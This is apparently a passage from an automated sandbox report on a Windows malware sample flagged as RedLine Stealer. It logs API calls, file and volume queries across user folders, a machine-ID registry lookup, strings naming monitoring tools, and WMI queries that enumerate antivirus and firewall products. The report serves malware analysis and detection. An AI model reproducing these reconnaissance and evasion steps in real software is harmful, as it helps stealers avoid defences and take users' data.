Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free, 4_2_10D86950
Source: C:\Windows\explorer.exe Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo, 4_2_10D8793C
Source: C:\Windows\explorer.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 4_2_10D86AAC
Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx, 4_2_10D88BF4
Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP, 4_2_10D88B40
Source: C:\Windows\explorer.exe Code function: GetLocaleInfoEx, 4_2_10D8F318
Source: C:\Windows\explorer.exe Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,wcschr,wcschr,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage, 4_2_10D88CF8
Source: C:\Windows\explorer.exe Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free, 4_2_10D86C28
Source: C:\Windows\explorer.exe Code function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP, 4_2_10D815BC
Source: C:\Windows\explorer.exe Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx, 4_2_10D886D4
Source: C:\Windows\explorer.exe Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free, 4_2_10D7F798
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: GetProcAddress,GetLocaleInfoW, 18_2_00007FFDFFC3DC20
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 18_2_00007FFDFFC8FA48
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 18_2_00007FFDFFC8F8C0
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: GetPrimaryLen,EnumSystemLocalesW, 18_2_00007FFDFFC8F478
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: GetPrimaryLen,EnumSystemLocalesW, 18_2_00007FFDFFC8F3C4
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: EnumSystemLocalesW, 18_2_00007FFDFFC8F35C
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: EnterCriticalSection,EnumSystemLocalesW,LeaveCriticalSection, 18_2_00007FFDFFC8D2E0
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\audiodg.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Queries volume information: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\7D3ED97FB83B796922796\7D3ED97FB83B796922796.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\ucrtbase.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\_ctypes.pyd VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-console-l1-1-0.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-datetime-l1-1-0.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-errorhandling-l1-1-0.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l1-1-0.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-file-l2-1-0.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-heap-l1-1-0.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-interlocked-l1-1-0.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-processthreads-l1-1-0.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-synch-l1-1-0.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-synch-l1-2-0.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-sysinfo-l1-1-0.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-timezone-l1-1-0.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-core-util-l1-1-0.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\api-ms-win-crt-conio-l1-1-0.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\libcrypto-1_1.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522\base_library.zip VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI26522 VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\Desktop VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\Desktop\BPMLNOBVSB VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\Desktop\NEBFQQYWPS VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\Desktop\NIKHQAIQAU VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\Desktop\ZQIXMVQGAH VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\Desktop\ZTGJILHXQB VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\Documents VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\Documents\BPMLNOBVSB VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\Documents\My Music VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\Documents\My Pictures VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\Documents\My Videos VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\Documents\NEBFQQYWPS VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\Documents\ZTGJILHXQB VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\Pictures VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\Pictures\Saved Pictures VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\Music VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Queries volume information: C:\Users\user\Downloads VolumeInformation Jump to behavior
Source: C:\Windows\explorer.exe Code function: 4_2_0E91531C GetSystemTimeAsFileTime,GetCurrentThreadId,GetTickCount64,GetTickCount64,QueryPerformanceCounter, 4_2_0E91531C
Source: C:\Windows\explorer.exe Code function: 4_2_0E904B50 GetUserNameW,GetComputerNameW,GetNativeSystemInfo,GetVersionExA,wsprintfA,free, 4_2_0E904B50
Source: C:\Users\user\AppData\Local\Temp\7405.tmp.zx.exe Code function: 17_2_00007FF69F404F10 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 17_2_00007FF69F404F10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF63A8332F0 GetVersionExW, 0_2_00007FF63A8332F0
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: file.exe, svchost.exe, 7D3ED97FB83B796922796.exe, audiodg.exe, msiexec.exe Binary or memory string: procmon.exe
Source: file.exe, svchost.exe, 7D3ED97FB83B796922796.exe, audiodg.exe, msiexec.exe Binary or memory string: procexp.exe
Source: file.exe, svchost.exe, 7D3ED97FB83B796922796.exe, audiodg.exe, msiexec.exe Binary or memory string: autoruns.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\4A64.tmp.x.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected RedLine Stealer
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 9.0.4A64.tmp.x.exe.a90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.1943024821.000000000AB61000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.1943582623.0000000000A92000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 2580, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 4A64.tmp.x.exe PID: 3484, type: MEMORYSTR
